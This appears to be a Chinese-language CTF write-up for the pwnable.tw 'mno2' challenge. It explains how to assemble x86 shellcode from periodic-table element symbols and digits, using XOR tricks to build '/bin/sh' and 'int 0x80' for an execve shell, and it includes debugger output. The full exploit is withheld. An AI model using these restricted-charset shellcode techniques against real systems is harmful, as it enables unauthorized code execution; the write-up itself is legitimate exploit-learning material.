mno2
pwnable.tw mno2 不附exp…
mno2
…shellcode被玩坏了… 这题是用数字和元素周期表的内容写shellcode… 做的时候感觉有时候判定有问题…最好不要拿数字去充填…有时候会出错… 做完之后再也不想碰这题…
ele=['\x48','\x48\x65','\x4C\x69','\x42\x65','\x42','\x43','\x4E','\x4F','\x46','\x4E\x65','\x4E\x61','\x4D\x67','\x41\x6C','\x53\x69','\x50','\x53','\x43\x6C','\x41\x72','\x4B','\x43\x61','\x53\x63','\x54\x69','\x56','\x43\x72','\x4D\x6E','\x46\x65','\x43\x6F','\x4E\x69','\x43\x75','\x5A\x6E','\x47\x61','\x47\x65','\x41\x73','\x53\x65','\x42\x72','\x4B\x72','\x52\x62','\x53\x72','\x59','\x5A\x72','\x4E\x62','\x4D\x6F','\x54\x63','\x52\x75','\x52\x68','\x50\x64','\x41\x67','\x43\x64','\x49\x6E','\x53\x6E','\x53\x62','\x54\x65','\x49','\x58\x65','\x43\x73','\x42\x61','\x4C\x61','\x43\x65','\x50\x72','\x4E\x64','\x50\x6D','\x53\x6D','\x45\x75','\x47\x64','\x54\x62','\x44\x79','\x48\x6F','\x45\x72','\x54\x6D','\x59\x62','\x4C\x75','\x48\x66','\x54\x61','\x57','\x52\x65','\x4F\x73','\x49\x72','\x50\x74','\x41\x75','\x48\x67','\x54\x6C','\x50\x62','\x42\x69','\x50\x6F','\x41\x74','\x52\x6E','\x46\x72','\x52\x61','\x41\x63','\x54\x68','\x50\x61','\x55','\x4E\x70','\x50\x75','\x41\x6D','\x43\x6D','\x42\x6B','\x43\x66','\x45\x73','\x46\x6D','\x4D\x64','\x4E\x6F','\x4C\x72','\x52\x66','\x44\x62','\x53\x67','\x42\x68','\x48\x73','\x4D\x74','\x44\x73','\x52\x67','\x43\x6E','\x46\x6C','\x4C\x76']
ele+=['1','2','3','4','5','6','7','8','9','0']
思路
- 寻找可用的元素..
- 凑/bin/sh
- 凑int 0x80
我是一个一个…试过去…数字组合当时没有想到..做得好辛苦i
'''
[H] dec eax 0x47
[He] would not be used
[B] inc edx 0x42
[C] inc ebx 0x43
[N] dec esi 0x4e
[O] dec edi 0x4f
[F] inc esi 0x46
[Ne] would not be used
[P] push eax 0x50
[S] push ebx 0x53
[K] dec ebx 0x4a
[Fe] would not be used
[I] dec ecx 0x48
[U] push ebp 0x55
[Y] pop ecx 0x59
[Ba] inc edx;popa 0x4261
[V] push esi 0x56
[W] push edi 0x57
[Bhxxxx] inc edx;push bytes
[Phxxxx] push esp;push 4bytes
[XeFN] pop eax;gs inc esi;dec esi
[PdFN] push eax;inc esi;dec esi
[GeFN] inc edi;gs inc esi;dec esi
[TeFN] push esp;gs inc esi;dec esi
[ReFN] push edx;gs inc esi;dec esi
[Rfx] push edx;inc ?x;
[07] xor BYTE PTR [edi],dh
[26] xor dh,BYTE PTR [esi]
[30] xor esi,DWORD PTR [eax]
[32] xor esi,DWORD PTR [edx]
[38] xor edi,DWORD PTR [eax]
['H', 'He', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'P', 'S', 'K', 'V', 'Fe', 'Ge', 'Se', 'Y', 'Rh', 'Pd', 'Cd', 'Te', 'I', 'Xe', 'Ce', 'Nd', 'Gd', 'W', 'Re', 'Th', 'U', 'Md', 'Bh']
'''
/bin/sh
如果我需要0x73的7我就需要n^n^7 or 6^3(6必须自己提供所以没办法1^2所以不行)只能 n^n^7
- 因为0x70是’p’所以只能由长度为2的元素的第二字节产生….发现还是有很多选择的
Ar,Cr,Cu,As,Br,Kr,Sr,Zr,Ru,Cs,Pr,Eu,Dy,Er,Lu,Os,Ir,Pt,Au,At,Fr,Np,Pu,Es,Lr,Hs,Mt,Ds,Lv - 因为这二字节元素的第一字节要用来产生2f这就是突破点..和可以产生0x2f的大写字母集合交叉一下得到
Pr,Ru,Pt,Pu,Lv,Lu,Lr,Np,Fr,Hs,Br,Dy,Cu,Ds,Cs,Sr,Kr,Os,Es,Mt,Ir,As,Ar,Au,,Eu,Cr,Zr,Er减少一种可能也是减少好吧…当我没说 我们随便选一个试试.. 例如Os吧.. 在一下几个组合中O可以xor两次获得0x2f
{'0', 'O', 'P'}, {'3', 'O', 'S'}, {'2', 'O', 'R'}, {'5', 'O', 'U'}, {'4', 'O', 'T'}, {'7', 'O', 'W'}, {'6', 'O', 'V'}, {'9', 'O', 'Y'},选一个试试看看 例如A:
?sOO,B:??00,C:??PP再来看看h–>0x68 …..需要用到小写字母所以C,B的?部分是2字节元素 例如A:?sOO,B:?B00,C:aBPP(我选了Ba,因为B单独是一个元素感觉应该会简单点…) ```python In [323]: chr(0x59) Out[323]: ‘Y’
In [324]: chr(0x50) Out[324]: ‘P’
泪流满面..被yi和磷拯救了...
所以A:`PsOO`,B:`YB00`,C:`aBPP`...试试看
```python
In [325]: b='YB00'
In [326]: a='PsOO'
In [327]: c='aBPP'
In [328]: for x in range(4):
print(chr(ord(a[x])^ord(b[x])^ord(c[x])))
.....:
h
s
/
/
#ESI 0x68732f2f ('//sh')
然后去弄/bin 发现0x69,0x62,0x6e都不能由一字节长度的元素组成..直接拿B开头的元素来试
Be
Br
Ba
Bi
Bk
Bh
一个字凑…
In [353]: hex(ord('i'))
Out[353]: '0x69'
In [354]: chr(0x57)
Out[354]: 'W'
In [355]: chr(0x50)
Out[355]: 'P'
A:iB??B:W???C:P???
第二字节如法炮制
{'4', 'B', 'Y'}
A:iBI4B:WiBYC:PBiB
….得到/bin/sh的我眼泪也掉下来..
─────────────────────────────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────────────────────────────
EAX 0xff9b8530 ◂— 0x50426942 ('BiBP')
EBX 0x0
ECX 0x0
EDX 0x804892e ◂— add byte ptr [ebx + 0x65], al
EDI 0x6e69622f ('/bin')
ESI 0x68732f2f ('//sh')
EBP 0xff9b8588 ◂— 0x0
ESP 0xff9b8530 ◂— 0x50426942 ('BiBP')
EIP 0x324f6ede ◂— push esi /* 0x65545756; 'VWTeFNVVVVBa' */
坐到后面发现我们只能用popal来使得ebx—>/bin/sh 所以我研究了一下pop all的顺序
EDI
ESI
EBP
?
EBX-->xxxx-->/bin/sh
EDX-->0
ECX-->0
EAX-->0xb
这个在弄完/bin/sh时压好最方便…//惨痛的教训
int 0x80
这个也需要凑.. 因为我们有
[26] xor dh,BYTE PTR [esi]
[07] xor BYTE PTR [edi],dh
所以我们先set esi edi=0方法同第一次
push esi
dec eax
dec eax
dec eax
dec eax
xor esi,DWORD PTR [eax]
然后set esi edi 为我们可以控制的地方例如0x324f6f43…
然后我们利用26,07…
所以我们又开始凑
A:0x?? B:0x?? C:0x88
目标是A^B^C==0xcd和0x80
因为第二个字节受前一个字节的约束所以我们先弄第二个字节
0x80
0x80比较简单AB只要凑出8就可以了 我们可以随便选择像是
In [452]: chr(0x43)
Out[452]: 'C'
In [453]: chr(0x4b)
Out[453]: 'K'
In [454]: hex(0x4b^0x43)
Out[454]: '0x8'
A:0x4b B:0x43 C:0xCa
0xcd
也就是我们要凑0x6 发现更简单… 随便选个S^U
exp
--
做了2天…内牛满面………
In [527]: f**k